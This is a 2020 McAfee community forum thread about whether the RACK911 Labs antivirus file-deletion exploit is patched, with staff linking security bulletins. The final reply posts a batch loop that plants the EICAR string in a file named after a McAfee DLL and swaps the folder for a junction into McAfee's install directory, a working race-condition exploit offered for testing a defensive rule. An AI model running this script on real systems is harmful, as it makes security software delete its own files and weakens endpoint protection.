cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Show  only  | Search instead for 
Did you mean: 
User58617863
Level 9
Report Inappropriate Content
Message 1 of 6
‎04-23-2020 07:55 AM

Exploit in McAfee Endpoint Security

Jump to solution
Hi, we would like to verify if the exploit provided by rack911labs is already fixed? This was identified way back 2018. https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/
0 Kudos
Reply
1 Solution

Accepted Solutions
Former Member
Not applicable
Report Inappropriate Content
Message 3 of 6
‎04-23-2020 11:55 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

Hello,

Please find the Security Bulletin released by McAfee with detailed information:

https://kc.mcafee.com/corporate/index?page=content&id=SB10316

https://kc.mcafee.com/corporate/index?page=content&id=KB92752

 

Was my reply helpful?
If you find this post useful, Please give it a Kudos! Also, Please don't forget to select "Accept as a solution" if this reply resolves your query!

View solution in original post

Reply
5 Replies
rfranci
Employee
Employee
Report Inappropriate Content
Message 2 of 6
‎04-23-2020 08:04 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

Hi @User58617863 ,

We do have fix for it.

Kindly see the below article for more details :

https://kc.mcafee.com/corporate/index?page=content&id=SB10254

 

Thank you,

Rohit Francis 

0 Kudos
Reply
Former Member
Not applicable
Report Inappropriate Content
Message 3 of 6
‎04-23-2020 11:55 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

Hello,

Please find the Security Bulletin released by McAfee with detailed information:

https://kc.mcafee.com/corporate/index?page=content&id=SB10316

https://kc.mcafee.com/corporate/index?page=content&id=KB92752

 

Was my reply helpful?
If you find this post useful, Please give it a Kudos! Also, Please don't forget to select "Accept as a solution" if this reply resolves your query!

Reply
User58617863
Level 9
Report Inappropriate Content
Message 4 of 6
‎04-24-2020 03:08 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

Thank you so much Sir Vivs!

0 Kudos
Reply
Nielsb
Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 5 of 6
‎04-24-2020 06:42 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

Hi

I would like to test the exploit prevention rule in report mode and I'm looking for a offical test script of McAfee for step 10 in KB92752.

"8. save the rule, and then save the settings.

9. Enforce the policy to a client system.

10. Validate the new Expert Rule on the client system."

https://kc.mcafee.com/corporate/index?page=content&id=KB92752

Thanks!

0 Kudos
Reply
jmcg
Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 6 of 6
‎04-24-2020 09:38 AM

Re: Exploit in McAfee Endpoint Security

Jump to solution

It's not official but you can back up "EpSecApiLib.dll" and test this script in a batch :

 

:loop
rd /s /q C:\Users\Username\Desktop\exploit
mkdir C:\Users\Username\Desktop\exploit
echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\Username\Desktop\exploit
mklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop

 

 

After your test done, restore your "EpSecApiLib.dll"

0 Kudos
Reply
You Deserve an Award
Don't forget, when your helpful posts earn a kudos or get accepted as a solution you can unlock perks and badges. Those aren't the only badges, either. How many can you collect? Click here to learn more.

Community Help Hub

    New to the forums or need help finding your way around the forums? There's a whole hub of community resources to help you.

  • Find Forum FAQs
  • Learn How to Earn Badges
  • Ask for Help
Go to Community Help

Join the Community

    Thousands of customers use our Community for peer-to-peer and expert product support. Enjoy these benefits with a free membership:

  • Get helpful solutions from product experts.
  • Stay connected to product conversations that matter to you.
  • Participate in product groups led by employees.
Join the Community
Join the Community

TrellixSkyhigh Security | Support Trellix.com SkyhighSecurity.com

Legal Privacy Copyright © 2023 Musarubra US LLC